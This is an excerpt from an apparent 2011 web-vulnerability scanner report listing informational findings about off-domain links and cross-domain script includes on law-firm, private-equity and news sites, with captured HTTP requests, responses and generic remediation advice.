...[SNIP]...
<h3 class="r"><a href="http://upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP" class=l onmousedown="return clk(this.href,'','','','13','','0CIEBEBYwDA')">Venue: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:i7OHqk31etIJ:upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP+Pillsbury+Winthrop+Shaw+Pittman&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIYBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIgBEKIIMA0')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIoBEKIIMA4')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIwBEKIIMA8')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.cooley.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CI4BEKIIMBA')">Cooley LLP</a>
...[SNIP]...

19.56. http://www.pomerantzlaw.com/attorneys.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/attorneys.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=24

The response contains the following links to other domains:

http://s7.addthis.com/button1-share.gif
http://s7.addthis.com/js/152/addthis_widget.js
http://www.addthis.com/bookmark.php

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=24', 'Cheryl D. Hamer')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

19.57. http://www.pomerantzlaw.com/cases.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/cases.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102

The response contains the following links to other domains:

http://s7.addthis.com/button1-share.gif
http://s7.addthis.com/js/152/addthis_widget.js
http://www.addthis.com/bookmark.php

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102', 'CKx')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

19.58. http://www.provequity.com/about_us/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.provequity.com
Path:	/about_us/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.provequity.com/about_us/index.asp?Section=1,0,0

The response contains the following link to another domain:

https://services.sungarddx.com/default.aspx?FM=Providence+Funds

Request

GET /about_us/index.asp?Section=1,0,0 HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16161
Content-Type: text/html
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.59. http://www.provequity.com/portfolio/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.provequity.com
Path:	/portfolio/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.provequity.com/portfolio/index.asp?Section=0,2,1&

The response contains the following link to another domain:

https://services.sungarddx.com/default.aspx?FM=Providence+Funds

Request

GET /portfolio/index.asp?Section=0,2,1& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27612
Content-Type: text/html
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.60. http://www.provequity.com/regions/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.provequity.com
Path:	/regions/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.provequity.com/regions/index.asp?Section=3,0,0&

The response contains the following link to another domain:

https://services.sungarddx.com/default.aspx?FM=Providence+Funds

Request

GET /regions/index.asp?Section=3,0,0& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15644
Content-Type: text/html
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.61. http://www.provequity.com/team/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.provequity.com
Path:	/team/index.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.provequity.com/team/index.asp?Employee_Type_ID=All&Section=0,1,1&

The response contains the following link to another domain:

https://services.sungarddx.com/default.aspx?FM=Providence+Funds

Request

GET /team/index.asp?Employee_Type_ID=All&Section=0,1,1& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 44998
Content-Type: text/html
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

20. Cross-domain script include previous next
There are 50 instances of this issue:

http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83
http://ads1.revenue.net/j
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://investmentfirmsdirect.com/
http://livetechtv.com/survey/c/indexns.html
http://pepperhamilton.com/
http://privatemoneytalk.com/
http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros
http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html
https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp
http://wolfgreenfield.com/
http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
http://www.butlerrubin.com/web/br.nsf/index
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg
http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg
http://www.carlyle.com/
http://www.carlyle.com/Contact/item7607.html
http://www.csscorp.com/
http://www.csscorp.com/contact-us/general-enquiry.php
http://www.csscorp.com/page-not-found.php
http://www.elawmarketing.com/about
http://www.elawmarketing.com/about/clients
http://www.elawmarketing.com/about/staff
http://www.elawmarketing.com/contact-us
http://www.elawmarketing.com/resources/reports/top-10-seo-best-practices-law-firm-websites-0
http://www.elawmarketing.com/services/websites
http://www.facebook.com/plugins/like.php
http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
http://www.gobignetwork.com/funding
http://www.korteco.com/live-project
http://www.mimecast.com/About-us/Contact-us/
http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
http://www.pomerantzlaw.com/attorneys.html
http://www.pomerantzlaw.com/cases.html
http://www.pomerantzlaw.com/contact-us.html
http://www.pomerantzlaw.com/practice-areas.html
http://www.pomerantzlaw.com/the-firm.html
http://www.privateequityinfo.com/
http://www.privateequityinfo.com/forgotpassword.php
http://www.privateequityinfo.com/product_details.php
http://www.providenceequitypartners.com/
http://www.soundpatheview.com/
http://www.vcgate.com/Private-Equity.htm
http://www.vcgate.com/favicon.ico
http://www.vcprodatabase.com/
http://www.vcprodatabase.com/favicon.ico

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

20.1. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bloomberg.com
Path:	/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2052462841/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=2052462841?
http://ad-emea.doubleclick.net/adj/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?
http://ad.amtk-media.com/jscript?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/1587021916/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2b
http://ad.amtk-media.com/jscript?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/131253292/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2b
http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=323024100?

Request

Response

20.2. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The response dynamically includes the following script from another domain:

http://panther1.cpxinteractive.com/mz/ds.js

Request

Response

20.3. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

20.4. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

20.5. http://investmentfirmsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investmentfirmsdirect.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://webezines.kwithost.com/lightbox/js/jquery.lightbox-0.5.js

Request

GET / HTTP/1.1
Host: investmentfirmsdirect.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 31 Dec 2001 7:32:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19148

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<link rel="stylesheet" href="http://webezines.kwithost.com/lightbox/css/jquery.lightbox-0.5.css" type="text/css" media="screen" />

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
<script src="http://webezines.kwithost.com/lightbox/js/jquery.lightbox-0.5.js" type="text/javascript"></script>
...[SNIP]...

20.6. http://livetechtv.com/survey/c/indexns.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://livetechtv.com
Path:	/survey/c/indexns.html

Issue detail

The response dynamically includes the following script from another domain:

http://j.maxmind.com/app/geoip.js

Request

GET /survey/c/indexns.html HTTP/1.1
Host: livetechtv.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:02:06 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "2024-4dc24efd-0"
Last-Modified: Thu, 05 May 2011 07:17:17 GMT
Content-Type: text/html
Content-Length: 8228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</style>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...

20.7. http://pepperhamilton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pepperhamilton.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://p.chango.com/p.js

Request

Response

20.8. http://privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://infusionextreme.com/tracker/js/t8ea1977da8b0f1a343c918eec0a87bfb.js

Request

Response

20.9. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5271.contextweb.com/B5456322.7;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~;ord=2131773229?
http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

20.10. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

20.11. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail.tuckerellis.com
Path:	/exchweb/bin/auth/owalogon.asp

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=webmail.tuckerellis.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

Response

20.12. http://wolfgreenfield.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wolfgreenfield.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://207.56.166.97/javascript/c_config.js
http://207.56.166.97/javascript/c_smartmenus.js
http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js

Request

GET / HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:51 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 14193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-eq
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" />
<script type="text/javascript" src="http://207.56.166.97/javascript/c_config.js"></script>
<script type="text/javascript" src="http://207.56.166.97/javascript/c_smartmenus.js"></script>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.13. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloomberg.com
Path:	/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gotraffic.net/v/20110510_141513/javascripts/main_f-min.js
http://cdn.gotraffic.net/v/20110510_141513/javascripts/s_code_p-min.js
http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline.js
http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline_stories.js
